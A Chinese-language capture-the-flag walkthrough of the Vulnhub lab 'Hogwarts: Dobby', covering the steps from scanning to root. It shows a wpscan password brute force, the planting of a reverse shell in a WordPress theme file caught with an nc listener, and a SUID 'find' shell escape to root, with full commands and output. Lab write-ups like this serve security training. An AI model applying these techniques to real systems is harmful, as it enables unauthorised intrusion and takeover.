标签：dobby usr rwsr 2020 Vulnhub xr wordpress root Dobby

Dobby

作者：jason_huawen

靶机信息

名称：Hogwarts: Dobby

地址：

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:9f:49:9e      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.207  08:00:27:a4:96:64      1      60  PCS Systemtechnik GmbH         

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.207

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.207 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-15 06:21 EST
Nmap scan report for 192.168.56.207
Host is up (0.00015s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Draco:dG9vIGVhc3kgbm8/IFBvdHRlcg==
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 08:00:27:A4:96:64 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.37 seconds

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ echo 'dG9vIGVhc3kgbm8/IFBvdHRlcg==' | base64 -d
too easy no? Potter              

Potter是用户名吗？

获得Shell

访问80端口，返回页面源代码中有注释：

<!--
     See: /alohomora
  -->

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ curl http://192.168.56.207/alohomora/      
Draco's password is his house ;)

Draco是用户名？密码是他的房子？

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ nikto -h http://192.168.56.207
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.207
+ Target Hostname:    192.168.56.207
+ Target Port:        80
+ Start Time:         2023-01-15 06:25:39 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.46 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2ae1, size: 5b3957e06e486, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2023-01-15 06:26:31 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.46) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? n

──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ gobuster dir -u http://192.168.56.207 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.207
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2023/01/15 06:27:12 Starting gobuster in directory enumeration mode
===============================================================
/log                  (Status: 200) [Size: 45]
/server-status        (Status: 403) [Size: 279]
Progress: 218329 / 220561 (98.99%)===============================================================
2023/01/15 06:27:38 Finished
===============================================================
                                                                    

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ curl http://192.168.56.207/log       
pass:OjppbGlrZXNvY2tz

hint --> /DiagonAlley
                         

/DiagonAlley为wordpress站点。

有个post，是brainfuck编码，

+++++ +++++ [->++ +++++ +++<] >.<++ +[->+ ++<]> ++.<+ ++[-> —<] >—-
..<++ ++[-> ++++< ]>+++ ++++. <++++ [->– –<]> .<+++ [->++ +<]>+ .<+++ +[->- —<] >–.< ++++[ ->+++ +<]>+ +++.- -.<++ +[->- –<]> —– .<+++ [->++ +<]>+ +++.<

解码以后：

donn��������

上面的密码是什么用户名的密码呢

用draco以及上面的密码登录wordpress后台，并不能成功登录，奇怪！！！

┌──(kali㉿kali)-[~]
└─$ echo 'OjppbGlrZXNvY2tz' | base64 -d
::ilikesocks

其实作者给出的密码是base64编码过的。

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ wpscan --url http://192.168.56.207/DiagonAlley/ -e u,p                                
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.207/DiagonAlley/ [192.168.56.207]
[+] Started: Sun Jan 15 06:37:04 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.46 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.207/DiagonAlley/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.207/DiagonAlley/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.207/DiagonAlley/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.207/DiagonAlley/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.3 identified (Insecure, released on 2020-10-30).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.207/DiagonAlley/index.php/feed/, <generator>https://wordpress.org/?v=5.5.3</generator>
 |  - http://192.168.56.207/DiagonAlley/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.3</generator>

[+] WordPress theme in use: amphibious
 | Location: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/
 | Latest Version: 1.0.1 (up to date)
 | Last Updated: 2020-04-15T00:00:00.000Z
 | Readme: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/readme.txt
 | Style URL: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3
 | Style Name: Amphibious
 | Style URI: https://templatepocket.com/free-wordpress-theme/amphibious-responsive-blog-wordpress-theme/
 | Description: Amphibious is an elegant magazine, personal, blog WordPress theme. Amphibious has a clean, modern an...
 | Author: TemplatePocket
 | Author URI: https://templatepocket.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3, Match: 'Version: 1.0.1'

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] draco
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.56.207/DiagonAlley/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] Draco
 | Found By: Rss Generator (Passive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Jan 15 06:37:07 2023
[+] Requests Done: 54
[+] Cached Requests: 6
[+] Data Sent: 15.186 KB
[+] Data Received: 303.258 KB
[+] Memory used: 233.68 MB
[+] Elapsed time: 00:00:03
                                                            

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ wpscan --url http://192.168.56.207/DiagonAlley/ -U draco -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.207/DiagonAlley/ [192.168.56.207]
[+] Started: Sun Jan 15 06:40:08 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.46 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.207/DiagonAlley/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.207/DiagonAlley/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.207/DiagonAlley/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.207/DiagonAlley/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.3 identified (Insecure, released on 2020-10-30).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.207/DiagonAlley/index.php/feed/, <generator>https://wordpress.org/?v=5.5.3</generator>
 |  - http://192.168.56.207/DiagonAlley/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.3</generator>

[+] WordPress theme in use: amphibious
 | Location: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/
 | Latest Version: 1.0.1 (up to date)
 | Last Updated: 2020-04-15T00:00:00.000Z
 | Readme: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/readme.txt
 | Style URL: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3
 | Style Name: Amphibious
 | Style URI: https://templatepocket.com/free-wordpress-theme/amphibious-responsive-blog-wordpress-theme/
 | Description: Amphibious is an elegant magazine, personal, blog WordPress theme. Amphibious has a clean, modern an...
 | Author: TemplatePocket
 | Author URI: https://templatepocket.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3, Match: 'Version: 1.0.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - draco / slytherin                                                                                                 
Trying draco / slytherin Time: 00:04:10 <                                           > (14930 / 14359322)  0.10%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: draco, Password: slytherin

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Jan 15 06:44:24 2023
[+] Requests Done: 15070
[+] Cached Requests: 37
[+] Data Sent: 8.042 MB
[+] Data Received: 8.99 MB
[+] Memory used: 292.348 MB
[+] Elapsed time: 00:04:15

成功破解出了draco的密码：slytherin

接下来登录wordpress管理后台，在appearance ->Editor中修改404.php，替换为shell.php代码。

而404.php的位置可以通过查看wordpress站点首页页面源代码：

http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/404.php

在Kali Linux上成功得到目标主机反弹回来的shell

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.207] 34256
Linux HogWarts 5.8.0-26-generic #27-Ubuntu SMP Wed Oct 21 22:29:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 13:37:52 up  1:18,  0 users,  load average: 0.03, 0.05, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

www-data@HogWarts:/home/dobby$ ls -alh
ls -alh
total 92K
drwxr-xr-x 16 dobby dobby 4.0K Nov  7  2020 .
drwxr-xr-x  3 root  root  4.0K Nov  7  2020 ..
-rw-------  1 dobby dobby 1.9K Nov  8  2020 .bash_history
-rw-r--r--  1 dobby dobby  220 Nov  7  2020 .bash_logout
-rw-r--r--  1 dobby dobby 3.7K Nov  7  2020 .bashrc
drwx------ 15 dobby dobby 4.0K Nov  7  2020 .cache
drwxr-xr-x 12 dobby dobby 4.0K Nov  7  2020 .config
drwx------  3 dobby dobby 4.0K Nov  8  2020 .gnupg
drwxr-xr-x  3 dobby dobby 4.0K Nov  7  2020 .local
drwx------  5 dobby dobby 4.0K Nov  7  2020 .mozilla
-rw-------  1 dobby dobby  313 Nov  7  2020 .mysql_history
-rw-r--r--  1 dobby dobby  807 Nov  7  2020 .profile
drwx------  2 dobby dobby 4.0K Nov  7  2020 .ssh
-rw-r--r--  1 dobby dobby    0 Nov  7  2020 .sudo_as_admin_successful
drwxr-xr-x  3 dobby dobby 4.0K Nov  8  2020 Descargas
drwxr-xr-x  2 dobby dobby 4.0K Nov  7  2020 Documentos
drwxr-xr-x  2 dobby dobby 4.0K Nov  8  2020 Escritorio
drwxr-xr-x  2 dobby dobby 4.0K Nov  7  2020 Imágenes
drwxr-xr-x  2 dobby dobby 4.0K Nov  7  2020 Música
drwxr-xr-x  2 dobby dobby 4.0K Nov  7  2020 Plantillas
drwxr-xr-x  2 dobby dobby 4.0K Nov  7  2020 Público
drwxr-xr-x  2 dobby dobby 4.0K Nov  7  2020 Vídeos
-rw-rw-r--  1 dobby dobby  106 Nov  7  2020 flag1.txt
-r--r-----  1 root  root   755 Nov  7  2020 sudoers
www-data@HogWarts:/home/dobby$ cat flag1.txt
cat flag1.txt
Command 'cat' not found, but can be installed with:
apt install coreutils
Please ask your administrator.
www-data@HogWarts:/home/dobby$ more flag1.txt
more flag1.txt
"Harry potter this year should not go to the school of wizardry"

flag1{28327a4964cb391d74111a185a5047ad}

虽然目标主机上没有cat命令，但可以使用more命令得到第1个flag

提权

将linpeas.sh脚本上传之目标主机/tmp目录，修改权限，并执行脚本，输出结果中以下部分：

═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════                       
                                         ╚═══════════════════╝                                                                
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid                                                   
strings Not Found                                                                                                             
-rwsr-xr-x 1 root root 109K Oct  8  2020 /snap/snapd/9721/usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)                                                                                          
-rwsr-xr-x 1 root root 43K Mar  5  2020 /snap/core18/1885/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8                                                                                                                    
-rwsr-xr-x 1 root root 63K Jun 28  2019 /snap/core18/1885/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1885/bin/su
-rwsr-xr-x 1 root root 27K Mar  5  2020 /snap/core18/1885/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1885/usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1885/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1885/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22  2019 /snap/core18/1885/usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22  2019 /snap/core18/1885/usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                                                                                     
-rwsr-xr-x 1 root root 146K Jan 31  2020 /snap/core18/1885/usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-network 42K Jun 11  2020 /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar  4  2019 /snap/core18/1885/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43K Sep 16  2020 /snap/core18/1932/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8                                                                                                                    
-rwsr-xr-x 1 root root 63K Jun 28  2019 /snap/core18/1932/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1932/bin/su
-rwsr-xr-x 1 root root 27K Sep 16  2020 /snap/core18/1932/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1932/usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1932/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1932/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22  2019 /snap/core18/1932/usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22  2019 /snap/core18/1932/usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                                                                                     
-rwsr-xr-x 1 root root 146K Jan 31  2020 /snap/core18/1932/usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-network 42K Jun 11  2020 /snap/core18/1932/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar  4  2019 /snap/core18/1932/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 23K Aug  3  2020 /usr/libexec/polkit-agent-helper-1
-rwsr-xr-- 1 root sssd 92K Oct  6  2020 /usr/libexec/sssd/ldap_child (Unknown SUID binary)
-rwsr-xr-- 1 root sssd 83K Oct  6  2020 /usr/libexec/sssd/p11_child (Unknown SUID binary)
-rwsr-xr-- 1 root sssd 168K Oct  6  2020 /usr/libexec/sssd/krb5_child (Unknown SUID binary)
-rwsr-xr-- 1 root sssd 31K Oct  6  2020 /usr/libexec/sssd/proxy_child (Unknown SUID binary)
-rwsr-xr-- 1 root sssd 56K Oct  6  2020 /usr/libexec/sssd/selinux_child (Unknown SUID binary)
-rwsr-xr-- 1 root dip 386K Jul 23  2020 /usr/sbin/pppd  --->  Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 15K Sep 29  2020 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 71K Aug 30  2020 /usr/bin/su
-rwsr-xr-x 1 root root 67K May 28  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                                                                                                      
-rwsr-xr-x 1 root root 179K Jul  8  2020 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 84K May 28  2020 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 47K Jul 24  2020 /usr/bin/base32
-rwsr-xr-x 1 root root 87K May 28  2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 313K Sep 30  2020 /usr/bin/find
-rwsr-xr-x 1 root root 31K Aug  3  2020 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 52K May 28  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 55K Aug 30  2020 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 39K Aug 30  2020 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K May 28  2020 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 39K Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 467K Jun  7  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 131K Oct 19  2020 /usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)                                                                                                          
-rwsr-xr-- 1 root messagebus 51K Sep 10  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 15K Oct  7  2020 /usr/lib/xorg/Xorg.wrap

可以利用find或者base32命令的SUID位进行提权

www-data@HogWarts:/tmp$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
# cd /root
cd /root
# ls -alh
ls -alh
total 32K
drwx------  4 root root 4.0K Nov  7  2020 .
drwxr-xr-x 20 root root 4.0K Nov  7  2020 ..
-rw-------  1 root root  162 Nov  7  2020 .bash_history
-rw-r--r--  1 root root 3.1K Aug 14  2019 .bashrc
drwx------  2 root root 4.0K Oct 22  2020 .cache
drwxr-xr-x  3 root root 4.0K Nov  7  2020 .local
-rw-r--r--  1 root root  161 Sep 16  2020 .profile
-rw-r--r--  1 root root 1.4K Nov  7  2020 proof.txt
# cat proof.txt
cat proof.txt
/bin/sh: 3: cat: not found
# more proof.txt
more proof.txt
                                         _ __
        ___                             | '  \
   ___  \ /  ___         ,'\_           | .-. \        /|
   \ /  | |,'__ \  ,'\_  |   \          | | | |      ,' |_   /|
 _ | |  | |\/  \ \ |   \ | |\_|    _    | |_| |   _ '-. .-',' |_   _
// | |  | |____| | | |\_|| |__    //    |     | ,'_`. | | '-. .-',' `. ,'\_
\\_| |_,' .-, _  | | |   | |\ \  //    .| |\_/ | / \ || |   | | / |\  \|   \
 `-. .-'| |/ / | | | |   | | \ \//     |  |    | | | || |   | | | |_\ || |\_|
   | |  | || \_| | | |   /_\  \ /      | |`    | | | || |   | | | .---'| |
   | |  | |\___,_\ /_\ _      //       | |     | \_/ || |   | | | |  /\| |
   /_\  | |           //_____//       .||`      `._,' | |   | | \ `-' /| |
        /_\           `------'        \ |   AND        `.\  | |  `._,' /_\
                                       \|       THE          `.\
                                            _  _  _  _  __ _  __ _ /_
                                           (_`/ \|_)/ '|_ |_)|_ |_)(_
                                           ._)\_/| \\_,|__| \|__| \ _)
                                                           _ ___ _      _
                                                          (_` | / \|\ ||__
                                                          ._) | \_/| \||___


root{63a9f0ea7bb98050796b649e85481845!!}
# 

成功实现提权，并拿到root flag

标签：dobby,usr,rwsr,2020,Vulnhub,xr,wordpress,root,Dobby
From： https://www.cnblogs.com/jason-huawen/p/17054118.html